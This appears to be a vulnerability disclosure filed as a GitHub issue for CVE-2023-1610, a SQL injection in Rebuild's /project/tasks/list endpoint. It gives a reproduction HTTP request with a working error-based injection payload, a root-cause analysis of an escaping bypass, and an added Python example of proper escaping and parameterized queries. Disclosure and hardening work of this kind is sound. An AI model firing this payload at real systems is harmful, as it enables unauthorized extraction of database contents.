Headline
CVE-2023-1610: SQL injection vulnerability exists in the /project/tasks/list interface of the rebuild system · Issue #597 · getrebuild/rebuild
A vulnerability, which was classified as critical, has been found in Rebuild up to 3.2.3. Affected by this issue is some unknown functionality of the file /project/tasks/list. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-223742 is the identifier assigned to this vulnerability.
Version
<=3.2.3
What's the problem
SQL injection vulnerability exists in the /project/tasks/list interface of the rebuild system.
How to reproduce this problem
Function points
Request message:
POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=1&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 0
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/project/050-0186e077f3840001/tasks
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679235290.8.1.1679235510.0.0.0
Connection: close
Payload: %25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)–+
Vulnerability reproduction
There you can see it!
System environment (OS/MySQL version/browser etc.)
Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome
Suggested description
SQL injection vulnerability exists in rebuild <=3.2.3.
Parameters were not properly validated, resulting in an SQL injection vulnerability.
Vulnerability Type
SQLi
Vendor of Product
https://github.com/getrebuild/rebuild
Affected Product Code Base
<=3.2.3
Affected Component
/project/tasks/list
Attack Type
Remote
Cause of vulnerability
In the com.rebuild.web.project.ProjectTaskController#taskList() method, part of the SQL statement is custom-built and is finally concatenated into the query statement.
Although the StringsEscapeUtils.escapeSql() method is used here to process user input, there is a bypass.
Finally, at line 122 of com.rebuild.web.project.ProjectTaskController, the user input is carried into the query statement, causing an SQL injection vulnerability.
The end, thanks!
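As an added illustration (not code from the issue or the Rebuild project), the following Python models why a quote-doubling escape is not sufficient for a MySQL string literal and what a proper fix looks like. It assumes the search term is concatenated into a LIKE pattern, the backslash-and-quote input shape is constructed from the report's payload prefix, and the function names are hypothetical.

```python
# Added example: quote-doubling escapes vs. MySQL backslash escapes, and the fix.

def escape_by_doubling_quotes(value: str) -> str:
    """Mimics an escapeSql()-style routine: only ' is doubled, backslash is untouched."""
    return value.replace("'", "''")

def escape_for_mysql(value: str) -> str:
    """Escape the backslash as well as the quote, the minimum for a MySQL literal
    when the server applies backslash escapes (its default sql_mode)."""
    return value.replace("\\", "\\\\").replace("'", "\\'")

def stays_inside_literal(body: str) -> bool:
    """Scan `body` the way MySQL scans the inside of a '...' literal.
    Returns False if an unescaped quote would close the literal early or a
    trailing backslash would swallow the real closing quote."""
    i, n = 0, len(body)
    while i < n:
        ch = body[i]
        if ch == "\\":
            if i + 1 >= n:
                return False          # backslash eats the closing quote
            i += 2                    # backslash plus the escaped character
        elif ch == "'":
            if i + 1 < n and body[i + 1] == "'":
                i += 2                # '' is a literal quote inside the string
            else:
                return False          # literal ended; the rest is parsed as SQL
        else:
            i += 1
    return True

def build_like_query(search: str, escaper) -> str:
    """Concatenating form, standing in for the pattern the report describes."""
    return "SELECT * FROM task WHERE name LIKE '%" + escaper(search) + "%'"

def is_injectable(search: str, escaper) -> bool:
    """True if the escaped search term can break out of the LIKE literal."""
    return not stays_inside_literal("%" + escaper(search) + "%")

def build_like_query_parameterized(search: str):
    """Hardened form: the value travels as a bind parameter, never as SQL text."""
    return "SELECT * FROM task WHERE name LIKE %s", ("%" + search + "%",)

# Constructed input: a backslash followed by a quote, the shape of the report's payload prefix.
BYPASS_INPUT = "\\' or 1=1 -- "
PLAIN_QUOTE_INPUT = "' or 1=1 -- "
```

Running `is_injectable` with both escapers shows that doubling quotes only neutralises a bare quote, while the backslash-prefixed input still terminates the literal; escaping the backslash too, or better, binding the value as a parameter, closes the gap.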